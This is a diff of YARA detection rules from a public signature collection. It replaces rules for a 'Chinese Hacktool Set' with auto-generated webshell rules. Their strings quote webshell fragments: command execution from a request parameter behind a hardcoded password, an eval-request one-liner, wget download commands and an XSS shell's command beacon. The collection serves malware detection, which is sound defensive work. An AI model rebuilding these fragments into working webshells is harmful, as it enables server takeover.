 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and ( pe.imphash ( ) == "0556ff5e5f8744bff47d4921494ba46d" or pe.imphash ( ) == "cb1194123f68a68eb14552c085b620ce" or pe.imphash ( ) == "efad9ff8c0d2a6419bf1dd970bcd806d" or pe.imphash ( ) == "7a861cd9c495e1d950a43cb708a22985" or pe.imphash ( ) == "a5d0545030be75a421529c2b0be6c4bd" or pe.imphash ( ) == "94491f4a812b0297419dc888aa4fd2a5" )
+		all of them
 }
-rule SIGNATURE_BASE_Tools_Cmd : FILE
+rule SIGNATURE_BASE_Adjustcr
 {
 	meta:
-		description = "Chinese Hacktool Set - file cmd.jSp"
+		description = "Webshells Auto-generated - file adjustcr.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "27c3cb44-9351-52a2-8e14-afade14e3384"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L10-L32"
+		id = "4b3d9409-60e8-502a-b37b-1e06d57c9b0b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8410-L8424"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "02e37b95ef670336dc95331ec73dbb5a86f3ba2b"
-		logic_hash = "fe1a157d53bd9a48848f2711844c5e12356652ca01c84c19429c55bbb12ea488"
+		hash = "17037fa684ef4c90a25ec5674dac2eb6"
+		logic_hash = "d2a86083ff5cb34a0453f812e2d316c63342e529f00099a8869fa7e0a43321ef"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(\"1752393\".equals(request.getParameter(\"Confpwd\"))){" fullword ascii
-		$s1 = "java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"Conn\"" ascii
-		$s2 = "<%@ page import=\"java.io.*\" %>" fullword ascii
-		$s3 = "out.print(\"Hi,Man 2015<br /><!--?Confpwd=023&Conn=ls-->\");" fullword ascii
-		$s4 = "while((a=in.read(b))!=-1){" fullword ascii
-		$s5 = "out.println(new String(b));" fullword ascii
-		$s6 = "out.print(\"</pre>\");" fullword ascii
-		$s7 = "out.print(\"<pre>\");" fullword ascii
-		$s8 = "int a = -1;" fullword ascii
-		$s9 = "byte[] b = new byte[2048];" fullword ascii
+		$s0 = "$Info: This file is packed with the UPX executable packer $"
+		$s2 = "$License: NRV for UPX is distributed under special license $"
+		$s6 = "AdjustCR Carr"
+		$s7 = "ION\\System\\FloatingPo"
 
 	condition:
-		filesize < 3KB and 7 of them
+		all of them
 }
-rule SIGNATURE_BASE_Trigger_Drop : FILE
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Xishell
 {
 	meta:
-		description = "Chinese Hacktool Set - file trigger_drop.php"
+		description = "Webshells Auto-generated - file xIShell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3b4f32ff-2de2-5689-869a-8a8f55e7fa0c"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L35-L51"
+		id = "32a32a9a-8d5f-5b3f-8ff4-560555f0ae1e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8425-L8436"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "165dd2d82bf87285c8a53ad1ede6d61a90837ba4"
-		logic_hash = "fc998ea5c2a446278823e4336ddc6a22741f82c43fbdcd95b3d12ee6a27b1dd7"
+		hash = "997c8437c0621b4b753a546a53a88674"
+		logic_hash = "13393bc72477ab9a4ebc16b409de8ed73e086cc41f25f34315d11401b63c2471"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$_GET['returnto'] = 'database_properties.php';" fullword ascii
-		$s1 = "echo('<meta http-equiv=\"refresh\" content=\"0;url=' . $_GET['returnto'] . '\">'" ascii
-		$s2 = "@mssql_query('DROP TRIGGER" ascii
-		$s3 = "if(empty($_GET['returnto']))" fullword ascii
+		$s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java"
 
 	condition:
-		filesize < 5KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Injectionparameters : FILE
+rule SIGNATURE_BASE_Hytop_Apppack_2005
 {
 	meta:
-		description = "Chinese Hacktool Set - file InjectionParameters.vb"
+		description = "Webshells Auto-generated - file 2005.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a77bd0c6-8857-577f-831a-0fcf2537667e"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L53-L67"
+		id = "67c86d16-a962-5502-8c39-0a6e3dc04031"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8437-L8448"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4f11aa5b3660c45e527606ee33de001f4994e1ea"
-		logic_hash = "6bb786256f7154013408323eeb597f91c609a2a26f5ae9e6d61e16bd9c16a577"
+		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+		logic_hash = "0de4800291132efca24b40bebcc895d6873110214c8cbf8384317208e0d9db82"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Public Shared ReadOnly Empty As New InjectionParameters(-1, \"\")" fullword ascii
-		$s1 = "Public Class InjectionParameters" fullword ascii
+		$s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb"
 
 	condition:
-		filesize < 13KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Users_List : FILE
+rule SIGNATURE_BASE_Xssshell
 {
 	meta:
-		description = "Chinese Hacktool Set - file users_list.php"
+		description = "Webshells Auto-generated - file xssshell.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2d90b593-6b65-502c-aeb0-8f2a3d65afd3"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L69-L84"
+		id = "ef89653c-5814-525a-b04e-4326a80f780c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8449-L8460"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6fba1a1a607198ed232405ccbebf9543037a63ef"
-		logic_hash = "debd8e1d882cbbe6e720b86bec3ff3c78393cb225b3f0f9c7725cfced6582e71"
+		hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4"
+		logic_hash = "6b0e602b523f58ec61850b4ba2e69da4fe4bf2833fb45e529785a398445db127"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<a href=\"users_create.php\">Create User</a>" fullword ascii
-		$s7 = "$skiplist = array('##MS_AgentSigningCertificate##','NT AUTHORITY\\NETWORK SERVIC" ascii
-		$s11 = "&nbsp;<b>Default DB</b>&nbsp;" fullword ascii
+		$s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma"
 
 	condition:
-		filesize < 12KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Trigger_Modify : FILE
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Usr
 {
 	meta:
-		description = "Chinese Hacktool Set - file trigger_modify.php"
+		description = "Webshells Auto-generated - file usr.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a7d65a9f-82de-554c-8f20-7560d2160041"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L86-L103"
+		id = "ab1825fe-96aa-5d97-acd6-eac43a12b237"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8461-L8472"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c93cd7a6c3f962381e9bf2b511db9b1639a22de0"
-		logic_hash = "6ea0221af9e9a29d3280a01eec69e31e79c358e664d286f8c80259f5e826876c"
+		hash = "ade3357520325af50c9098dc8a21a024"
+		logic_hash = "f5fd4a4c1b531b23b09505d302dc27d7ba2eb733fcf313c04ba9085b090f7cbe"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<form name=\"form1\" method=\"post\" action=\"trigger_modify.php?trigger=<?php e" ascii
-		$s2 = "$data_query = @mssql_query('sp_helptext \\'' . urldecode($_GET['trigger']) . '" ascii
-		$s3 = "if($_POST['query'] != '')" fullword ascii
-		$s4 = "$lines[] = 'I am unable to read this trigger.';" fullword ascii
-		$s5 = "<b>Modify Trigger</b>" fullword ascii
+		$s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor"
 
 	condition:
-		filesize < 15KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Customize : FILE
+rule SIGNATURE_BASE_FSO_S_Phpinj
 {
 	meta:
-		description = "Chinese Hacktool Set - file Customize.aspx"
+		description = "Webshells Auto-generated - file phpinj.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a69e1234-cc85-5295-a45c-693afdfc368e"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L105-L121"
+		id = "5d84d518-0e18-517f-890b-e296ac265c50"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8473-L8484"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "db556879dff9a0101a7a26260a5d0dc471242af2"
-		logic_hash = "f4e0a7342a01411ae060c9d995072518f2e3299af1b0d396bb319eeec42c1519"
+		hash = "dd39d17e9baca0363cc1c3664e608929"
+		logic_hash = "de4ac200f5426ec4c6fef21d5fbc37281811569a3e71a9bcb6fa51d13eb600a4"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "ds.Clear();ds.Dispose();}else{SqlCommand cm = Conn.CreateCommand();cm.CommandTex" ascii
-		$s2 = "c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=tr" ascii
-		$s3 = "Stream WF=WB.GetResponseStream();FileStream FS=new FileStream(Z2,FileMode.Create" ascii
-		$s4 = "R=\"Result\\t|\\t\\r\\nExecute Successfully!\\t|\\t\\r\\n\";}Conn.Close();break;" ascii
+		$s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';"
 
 	condition:
-		filesize < 24KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Oracle_Data
+rule SIGNATURE_BASE_Xssshell_Db
 {
 	meta:
-		description = "Chinese Hacktool Set - file oracle_data.php"
+		description = "Webshells Auto-generated - file db.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "faa62dcc-0f59-573c-8722-d07216de151f"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L123-L138"
+		id = "94bb2297-95a2-5442-bb16-fb079a29606e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8485-L8496"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6cf070017be117eace4752650ba6cf96d67d2106"
-		logic_hash = "1ab9b6c4349dd891103a24a77c93c2abb784d3ed616523f3aaec68b05082983e"
+		hash = "cb62e2ec40addd4b9930a9e270f5b318"
+		logic_hash = "3fdbaa17c12abef8576bf859065d90f4b6e80c187af734b71b26a1bd5d073e86"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$txt=fopen(\"oracle_info.txt\",\"w\");" fullword ascii
-		$s1 = "if(isset($_REQUEST['id']))" fullword ascii
-		$s2 = "$id=$_REQUEST['id'];" fullword ascii
+		$s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Reduhservers_Reduh : FILE
+rule SIGNATURE_BASE_PHP_Sh
 {
 	meta:
-		description = "Chinese Hacktool Set - file reDuh.jsp"
+		description = "Webshells Auto-generated - file sh.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c87d971a-a16f-5593-88fb-6bcd207e0841"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L140-L155"
+		id = "08dff4db-3b1c-5702-a8c9-efaedf83c4ff"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8497-L8508"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "377886490a86290de53d696864e41d6a547223b0"
-		logic_hash = "dcb1515da696566d01ec64029a34438a56d2df480b9cd2ea586f71ffe3324c1a"
+		hash = "1e9e879d49eb0634871e9b36f99fe528"
+		logic_hash = "da0b572f116cc5c55e8d7469f222896d602d09be4761a0e2139fc8ce67ac4050"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "out.println(\"[Error]Unable to connect to reDuh.jsp main process on port \" +ser" ascii
-		$s4 = "System.out.println(\"IPC service failed to bind to \" + servicePort);" fullword ascii
-		$s17 = "System.out.println(\"Bound on \" + servicePort);" fullword ascii
-		$s5 = "outputFromSockets.add(\"[data]\"+target+\":\"+port+\":\"+sockNum+\":\"+new Strin" ascii
+		$s1 = "\"@$SERVER_NAME \".exec(\"pwd\")"
 
 	condition:
-		filesize < 116KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Item_Old : FILE
+rule SIGNATURE_BASE_Xssshell_Default
 {
 	meta:
-		description = "Chinese Hacktool Set - file item-old.php"
+		description = "Webshells Auto-generated - file default.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c32bbd48-a363-53c7-84c6-c47581e2f9da"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L157-L172"
+		id = "1c221572-4cb5-5806-a856-0f857dba230a"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8509-L8520"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "daae358bde97e534bc7f2b0134775b47ef57e1da"
-		logic_hash = "181e46408050490dccc4f321bd1072da0436d920e16cc4711b16425eb5bd73ed"
+		hash = "d156782ae5e0b3724de3227b42fcaf2f"
+		logic_hash = "6a8772a8a6399c3266abcc22a3c55eda70ec9703346398f5f1768bbd35974f8c"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii
-		$s2 = "$sCmd = \"convert \".$sFile.\" -flip -quality 80 \".$sFileOut;" fullword ascii
-		$s3 = "$sHash = md5($sURL);" fullword ascii
+		$s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")"
 
 	condition:
-		filesize < 7KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Tools_2014 : FILE
+rule SIGNATURE_BASE_Editserver_2
 {
 	meta:
-		description = "Chinese Hacktool Set - file 2014.jsp"
+		description = "Webshells Auto-generated - file EditServer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bb76321b-003d-5f6b-a84b-425477abe91c"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L174-L189"
+		id = "bd254bd9-fd23-5807-9347-2a559089b7c5"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8521-L8534"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "74518faf08637c53095697071db09d34dbe8d676"
-		logic_hash = "caa365cc1a641b7dcd5d2082240d981e66caf6da1379ee109a0bb1f651d1f00f"
+		hash = "5c1f25a4d206c83cdfb006b3eb4c09ba"
+		logic_hash = "c581936928ce0f1061feb5665c743f14f12a9f875e360f40cc064f3047b23adf"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "((Invoker) ins.get(\"login\")).invoke(request, response," fullword ascii
-		$s4 = "program = \"cmd.exe /c net start > \" + SHELL_DIR" fullword ascii
-		$s5 = ": \"c:\\\\windows\\\\system32\\\\cmd.exe\")" fullword ascii
+		$s0 = "@HOTMAIL.COM"
+		$s1 = "Press Any Ke"
+		$s3 = "glish MenuZ"
 
 	condition:
-		filesize < 715KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Reduhservers_Reduh_2 : FILE
+rule SIGNATURE_BASE_By064Cli
 {
 	meta:
-		description = "Chinese Hacktool Set - file reDuh.php"
+		description = "Webshells Auto-generated - file by064cli.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6050dfde-6c79-5dd8-a772-508668177aa5"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L191-L206"
+		id = "9ea88f0c-9275-5567-a4d9-0545de8044d1"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8535-L8547"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "512d0a3e7bb7056338ad0167f485a8a6fa1532a3"
-		logic_hash = "954115da374b6d72c35244673799be6e8bae5288f53509dea04e3ae3c489af12"
+		hash = "10e0dff366968b770ae929505d2a9885"
+		logic_hash = "51efd5c510efc6657ae175af47b09437ae70eb0237d88ffdf3cdae365d0ec7be"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "errorlog(\"FRONTEND: send_command '\".$data.\"' on port \".$port.\" returned \"." ascii
-		$s2 = "$msg = \"newData:\".$socketNumber.\":\".$targetHost.\":\".$targetPort.\":\".$seq" ascii
-		$s3 = "errorlog(\"BACKEND: *** Socket key is \".$sockkey);" fullword ascii
+		$s7 = "packet dropped,redirecting"
+		$s9 = "input the password(the default one is 'by')"
 
 	condition:
-		filesize < 57KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Customize_2 : FILE
+rule SIGNATURE_BASE_Mithril_Dlltest
 {
 	meta:
-		description = "Chinese Hacktool Set - file Customize.jsp"
+		description = "Webshells Auto-generated - file dllTest.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1f7e9063-33d8-5df4-89d5-7d8fc1be61f0"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L208-L222"
+		id = "59a6bfb6-c099-56cd-b40e-3e92ea0eb7d3"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8548-L8560"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "37cd17543e14109d3785093e150652032a85d734"
-		logic_hash = "aa0940a21eea6ba50a93dd36a8f914f636fdba0685048fc67e16dd68c1c2794e"
-		score = 75
+		hash = "a8d25d794d8f08cd4de0c3d6bf389e6d"
+		logic_hash = "c8c8d1b75ed4eb4bc66a762e53aa6b3ab439e96ef464a8b9ffa4dff887986465"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "while((l=br.readLine())!=null){sb.append(l+\"\\r\\n\");}}" fullword ascii
-		$s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii
+		$s0 = "please enter the password:"
+		$s3 = "\\dllTest.pdb"
 
 	condition:
-		filesize < 30KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Chinachopper_One : FILE
+rule SIGNATURE_BASE_Peek_A_Boo
 {
 	meta:
-		description = "Chinese Hacktool Set - file one.asp"
+		description = "Webshells Auto-generated - file peek-a-boo.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "854fb5c9-38c7-5fd2-a473-66ae297070f5"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L224-L237"
+		id = "f6ca33b5-e37f-5124-a193-a3056c559314"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8561-L8577"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6cd28163be831a58223820e7abe43d5eacb14109"
-		logic_hash = "f9a6e4b8556eb3f1e1cbe0bc4eb225b9564ac59aae4a97f184806c6bec95578d"
+		hash = "aca339f60d41fdcba83773be5d646776"
+		logic_hash = "b103c1b873dd0df9626d72a1127fbadc821777a05012a080423263a2083c398b"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%eval request(" ascii
+		$s0 = "__vbaHresultCheckObj"
+		$s1 = "\\VB\\VB5.OLB"
+		$s2 = "capGetDriverDescriptionA"
+		$s3 = "__vbaExceptHandler"
+		$s4 = "EVENT_SINK_Release"
+		$s8 = "__vbaErrorOverflow"
 
 	condition:
-		filesize < 50 and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Tools_Old : FILE
+rule SIGNATURE_BASE_Fmlibraryv3
 {
 	meta:
-		description = "Chinese Hacktool Set - file old.php"
+		description = "Webshells Auto-generated - file fmlibraryv3.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bfdb84e8-e5a8-53a4-ae71-e0d1b38d38ef"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L239-L255"
+		id = "9b8ef79d-80bb-5a05-91e6-0f2bc3fd3068"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8578-L8589"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f8a007758fda8aa1c0af3c43f3d7e3186a9ff307"
-		logic_hash = "3f0ac357e9a9fb4ee937b53145b33ba1041310d979cbc3feb0a4caf026b9b730"
+		hash = "c34c248fed6d5a20d8203924a2088acc"
+		logic_hash = "a7dc83db26cdda757f626c42022c17bb2764074a3cc5f87b4a3aaa991fac5dc2"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii
-		$s1 = "$sURL = \"http://\".$sServer.\"/\".$sFile;" fullword ascii
-		$s2 = "chmod(\"/\".substr($sHash, 0, 2), 0777);" fullword ascii
-		$s3 = "$sCmd = \"echo 123> \".$sFileOut;" fullword ascii
+		$s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"
 
 	condition:
-		filesize < 6KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Item_301 : FILE
+rule SIGNATURE_BASE_Debug_Dlltest_2
 {
 	meta:
-		description = "Chinese Hacktool Set - file item-301.php"
+		description = "Webshells Auto-generated - file dllTest.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4ee9a089-313f-53c1-8196-1348d721dbf4"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L257-L273"
+		id = "cf81e3de-513c-584d-bc37-6504e91b170c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8590-L8602"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "15636f0e7dc062437608c1f22b1d39fa15ab2136"
